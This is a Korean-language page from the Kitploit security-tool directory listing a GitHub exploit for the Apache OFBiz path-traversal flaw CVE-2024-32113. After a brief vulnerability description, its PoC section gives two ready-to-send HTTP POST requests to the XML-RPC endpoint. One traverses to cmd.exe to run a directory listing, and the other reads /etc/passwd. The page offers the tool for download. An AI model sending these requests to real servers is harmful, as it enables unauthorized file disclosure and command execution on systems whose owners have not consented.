Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Apache-OFBiz-Directory-Traversal-exploit — Apache OFBiz CVE-2024-32113 경로 순회 취약점을 악용하는 익스플로잇으로, 조작된 XML-RPC 요청을 통해 취약한 서버에서 임의 파일 읽기 및 잠재적 명령 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationWeb SecurityPenetration Testing
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Apache OFBiz CVE-2024-32113 경로 순회 취약점을 악용하는 익스플로잇으로, 조작된 XML-RPC 요청을 통해 취약한 서버에서 임의 파일 읽기 및 잠재적 명령 실행을 가능하게 합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1632년 전아직 검토되지 않음

Apache-OFBiz-Directory-Traversal-exploit

Apache OFBiz 18.12.12까지의 버전에서 치명적(critical)으로 분류된 취약점이 발견되었습니다. 이 문제의 영향을 받는 부분은 알려지지 않은 기능입니다. 알 수 없는 입력을 통한 조작으로 경로 순회(path traversal) 취약점이 발생합니다. 이 제품은 제한된 상위 디렉토리 아래에 있는 파일이나 디렉토리를 식별하기 위한 경로명을 구성할 때 외부 입력을 사용하지만, 경로명 내의 특수 요소를 적절히 중화하지 못하여 경로명이 제한된 디렉토리 외부의 위치를 가리키게 될 수 있습니다. 기밀성, 무결성, 가용성에 영향을 미칩니다.

소개

  • CVE-2024-32113 취약점은 특수하게 조작된 HTTP 요청을 전송하여 Apache OFBiz 서버에서 임의 코드 실행을 허용합니다.
  • 이 요청에서 공격자는 ../../../../../../etc/passwd 매개변수를 사용하여 Apache OFBiz 서버의 etc/passwd 파일을 가리킵니다.
  • Apache OFBiz 서버가 이 요청을 처리하면 서버의 사용자에 대한 민감한 정보가 포함된 etc/passwd 파일을 읽으려고 시도합니다.
  • 이 정보는 데이터 탈취, 수정, 심지어 삭제와 같은 서버에 대한 추가 공격을 수행하는 데 사용될 수 있습니다.

Poc

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

또는

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
도구 다운로드